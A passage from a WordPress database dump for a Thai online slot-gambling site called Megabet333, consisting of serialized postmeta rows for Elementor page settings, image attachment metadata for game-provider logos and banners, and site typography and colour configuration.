621376273222267627716064453125,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"mgbline.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(265,47,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(271,48,'_wp_attached_file','2025/10/Megabet_333_Biz_-_Logo.webp'),(272,48,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:422;s:4:\"file\";s:35:\"2025/10/Megabet_333_Biz_-_Logo.webp\";s:8:\"filesize\";i:41578;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"Megabet_333_Biz_-_Logo-300x66.webp\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6920;}s:5:\"large\";a:5:{s:4:\"file\";s:36:\"Megabet_333_Biz_-_Logo-1024x225.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24374;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"Megabet_333_Biz_-_Logo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5336;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"Megabet_333_Biz_-_Logo-768x169.webp\";s:5:\"width\";i:768;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18030;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:36:\"Megabet_333_Biz_-_Logo-1536x338.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:35814;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(273,49,'_wp_attached_file','2025/10/Character_slot_1_-_Megabet333-Biz.webp'),(274,49,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:46:\"2025/10/Character_slot_1_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:132878;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"Character_slot_1_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15324;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"Character_slot_1_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:96932;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"Character_slot_1_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14336;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"Character_slot_1_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:64926;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(275,50,'_wp_attached_file','2025/10/3icon_-_Megabet333-Biz.webp'),(276,50,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:35:\"2025/10/3icon_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:55526;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"3icon_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12520;}s:5:\"large\";a:5:{s:4:\"file\";s:36:\"3icon_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:53514;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"3icon_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6542;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"3icon_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:38914;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(277,51,'_wp_attached_file','2025/10/Character_slot_2_-_Megabet333-Biz.webp'),(278,51,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:46:\"2025/10/Character_slot_2_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:157098;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"Character_slot_2_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16850;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"Character_slot_2_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:110448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"Character_slot_2_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15796;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"Character_slot_2_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:72876;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(279,52,'_wp_attached_file','2025/10/Character_slot_3_-_Megabet333-Biz.webp'),(280,52,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:46:\"2025/10/Character_slot_3_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:165404;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"Character_slot_3_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18784;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"Character_slot_3_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:118612;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"Character_slot_3_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16084;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"Character_slot_3_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:79574;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(281,53,'_wp_attached_file','2025/10/79_Get_200_-_Megabet333-Biz.webp'),(282,53,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:40:\"2025/10/79_Get_200_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:61740;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"79_Get_200_-_Megabet333-Biz-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:26436;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"79_Get_200_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(283,54,'_wp_attached_file','2025/10/JILI_-_Megabet333-Biz.webp'),(284,54,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:34:\"2025/10/JILI_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:29000;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"JILI_-_Megabet333-Biz-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14476;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"JILI_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8456;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(285,55,'_wp_attached_file','2025/10/JOKER_-_Megabet333-Biz.webp'),(286,55,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:35:\"2025/10/JOKER_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:38418;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"JOKER_-_Megabet333-Biz-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16520;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"JOKER_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8314;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(287,56,'_wp_attached_file','2025/10/Megabet_333_Biz_-_M_Logo.webp'),(288,56,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:37:\"2025/10/Megabet_333_Biz_-_M_Logo.webp\";s:8:\"filesize\";i:11290;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"Megabet_333_Biz_-_M_Logo-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5884;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"Megabet_333_Biz_-_M_Logo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2870;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(289,57,'_wp_attached_file','2025/10/Microgaming_-_Megabet333-Biz.webp'),(290,57,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:41:\"2025/10/Microgaming_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:33146;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Microgaming_-_Megabet333-Biz-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14874;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Microgaming_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8008;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(291,58,'_wp_attached_file','2025/10/Pragmatic_-_Megabet333-Biz.webp'),(292,58,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:651;s:6:\"height\";i:500;s:4:\"file\";s:39:\"2025/10/Pragmatic_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:58740;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Pragmatic_-_Megabet333-Biz-300x230.webp\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19514;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Pragmatic_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9086;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(293,59,'_wp_attached_file','2025/10/PG_-_Megabet333-Biz.webp'),(294,59,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:651;s:6:\"height\";i:500;s:4:\"file\";s:32:\"2025/10/PG_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:72494;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"PG_-_Megabet333-Biz-300x230.webp\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22232;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"PG_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10106;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(295,60,'_wp_attached_file','2025/10/search_megabet_333_-_Megabet333-Biz.webp'),(296,60,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:48:\"2025/10/search_megabet_333_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:61890;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"search_megabet_333_-_Megabet333-Biz-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27278;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"search_megabet_333_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9620;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(297,61,'_wp_attached_file','2025/10/Slot_demo_play_-_Megabet333-Biz.webp'),(298,61,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:44:\"2025/10/Slot_demo_play_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:110984;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"Slot_demo_play_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14528;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"Slot_demo_play_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:79916;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"Slot_demo_play_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8580;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"Slot_demo_play_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:55058;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(299,62,'_wp_attached_file','2025/10/Slot_xo_-_Megabet333-Biz.webp'),(300,62,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:37:\"2025/10/Slot_xo_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:41422;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"Slot_xo_-_Megabet333-Biz-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19976;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"Slot_xo_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10706;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(301,46,'_wp_old_date','2025-10-22'),(302,41,'_wp_old_date','2025-10-22'),(303,40,'_wp_old_date','2025-10-22'),(304,39,'_wp_old_date','2025-10-22'),(305,38,'_wp_old_date','2025-10-22'),(306,63,'_elementor_edit_mode','builder'),(307,63,'_elementor_template_type','kit'),(308,63,'_wp_page_template','default'),(309,63,'_elementor_page_settings','a:55:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#A50808\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#A50808\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#A50808\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"Megabet333\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:10:\"body_color\";s:7:\"#FFFFFF\";s:26:\"body_typography_typography\";s:6:\"custom\";s:27:\"body_typography_font_family\";s:6:\"Prompt\";s:25:\"body_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:17:\"link_normal_color\";s:7:\"#F5D708\";s:33:\"link_normal_typography_typography\";s:6:\"custom\";s:34:\"link_normal_typography_font_family\";s:6:\"Prompt\";s:32:\"link_normal_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:24:\"h1_typography_typography\";s:6:\"custom\";s:25:\"h1_typography_font_family\";s:6:\"Prompt\";s:23:\"h1_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:29;s:5:\"sizes\";a:0:{}}s:24:\"h2_typography_typography\";s:6:\"custom\";s:25:\"h2_typography_font_family\";s:6:\"Prompt\";s:23:\"h2_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:26;s:5:\"sizes\";a:0:{}}s:24:\"h3_typography_typography\";s:6:\"custom\";s:25:\"h3_typography_font_family\";s:6:\"Prompt\";s:23:\"h3_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:24;s:5:\"sizes\";a:0:{}}s:24:\"h4_typography_typography\";s:6:\"custom\";s:25:\"h4_typography_font_family\";s:6:\"Prompt\";s:23:\"h4_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:24:\"h5_typography_typography\";s:6:\"custom\";s:25:\"h5_typography_font_family\";s:6:\"Prompt\";s:23:\"h5_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:24:\"h6_typography_typography\";s:6:\"custom\";s:25:\"h6_typography_font_family\";s:6:\"Prompt\";s:23:\"h6_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:30:\"h1_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:22;s:5:\"sizes\";a:0:{}}s:30:\"h2_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:20;s:5:\"sizes\";a:0:{}}s:30:\"h3_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:30:\"h4_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:30:\"h5_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:30:\"h6_typography_font_size_mobile\";a:3:{